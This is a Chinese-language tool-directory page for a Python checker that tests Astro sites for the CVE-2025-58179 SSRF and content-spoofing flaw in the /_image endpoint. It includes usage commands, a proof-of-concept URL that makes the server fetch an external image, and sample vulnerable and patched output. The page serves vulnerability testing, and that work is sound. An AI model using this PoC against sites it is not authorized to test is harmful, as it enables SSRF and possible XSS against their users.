Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2025-58179-Check | Kitploit
工具/GitHubGitHub/shitodcy/cve-2025-58179-check
漏洞分析漏洞利用Web应用程序漏洞利用Web安全渗透测试学习与教育
GitHubshitodcy/cve-2025-58179-check

CVE-2025-58179-Check

查看仓库
19个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2025-58179-Check

CVE-2025-58179-Check 是一个简单的 Python 脚本,用于验证 Astro 框架中 /_image 端点上的 SSRF(服务器端请求伪造)/ Content Spoofing(内容欺骗)漏洞。

该漏洞被跟踪为 GHSA-qpr4-c339-7vq8 和 CVE-2025-58179。

漏洞背景

该漏洞影响使用 @astrojs/cloudflare 适配器并配置了 output: 'server' 的 Astro 站点。本应优化图片的 /_image 端点未能正确验证 href 参数。

这允许攻击者诱使服务器获取并提供来自任意未授权外部域的内容。其影响可能是 SSRF;如果外部内容是恶意文件(例如包含脚本的 SVG),则可能导致跨站脚本(XSS)。

此脚本可自动化测试流程,以检查站点是否容易受到此问题的影响。

功能

  • 自动生成格式正确的 PoC(概念验证)URL。
  • (可选)执行 HTTP 验证以检查服务器响应。
  • 为输出添加颜色标识,便于分析(状态码、结果)。
  • 检测易受攻击的响应(例如,Status 200 且 Content-Type: image/*)。

要求

  • Python 3
  • requests 库(仅在需要使用验证功能时)

您可以使用 pip 安装 requests:

root@kitploit:~
pip install requests

使用方法

  1. 克隆此仓库,或复制 CVE-2025-58179-Check.py 脚本。
  2. 确保脚本具有可执行权限(如有需要):chmod +x CVE-2025-58179-Check.py

1. 仅生成 URL(不进行验证)

此选项仅打印已编码的 PoC URL。如果您想在浏览器或其他工具中手动测试,这会很有用。

命令:

root@kitploit:~
python CVE-2025-58179-Check.py -u <URL_TARGET> -i <URL_GAMBAR_EKSTERNAL>

示例:

root@kitploit:~
python CVE-2025-58179-Check.py -u [https://target-astro-site.com](https://target-astro-site.com) -i [https://example.com/image.jpg](https://example.com/image.jpg)

输出:

root@kitploit:~
[+] Generated URL:
[https://target-astro-site.com/_image?href=https%3A%2F%2Fexample.com%2Fimage.jpg](https://target-astro-site.com/_image?href=https%3A%2F%2Fexample.com%2Fimage.jpg)

2. 生成 URL 并执行 HTTP 验证

此选项会生成 URL,并立即发送 HTTP GET 请求以验证服务器响应。

命令:

root@kitploit:~
python CVE-2025-58179-Check.py -u <URL_TARGET> -i <URL_GAMBAR_EKSTERNAL> -r

示例:

root@kitploit:~
python CVE-2025-58179-Check.py -u [https://target-astro-site.com](https://target-astro-site.com) -i [https://example.com/image.jpg](https://example.com/image.jpg) --request

验证输出示例

示例结果:易受攻击(Vulnerable)

如果服务器返回状态码 200 且内容类型为图片,则表明服务器已获取并提供外部内容。

root@kitploit:~
[+] Generated URL:
[https://target-astro-site.com/_image?href=https%3A%2F%2Fexample.com%2Fimage.jpg](https://target-astro-site.com/_image?href=https%3A%2F%2Fexample.com%2Fimage.jpg)

[+] Sending HTTP request...
[+] Status Code: 200
[+] Content Type: image/jpeg
[+] Server returned image content - Potential vulnerability detected!

示例结果:不易受攻击(已修补)

已修补或配置正确的服务器会拒绝指向未经授权外部域的请求,通常返回 4xx 状态码。

root@kitploit:~
[+] Generated URL:
[https://target-astro-site.com/_image?href=https%3A%2F%2Fexample.com%2Fimage.jpg](https://target-astro-site.com/_image?href=https%3A%2F%2Fexample.com%2Fimage.jpg)

[+] Sending HTTP request...
[+] Status Code: 400
[+] Content Type: text/plain;charset=UTF-8
[+] Client error - Resource might not be accessible

[!WARNING] 警告

  • 此脚本仅用于教育和合法的安全测试目的。
  • 用户应对其行为承担全部责任。请勿在未经授权的系统上使用此脚本。
下载工具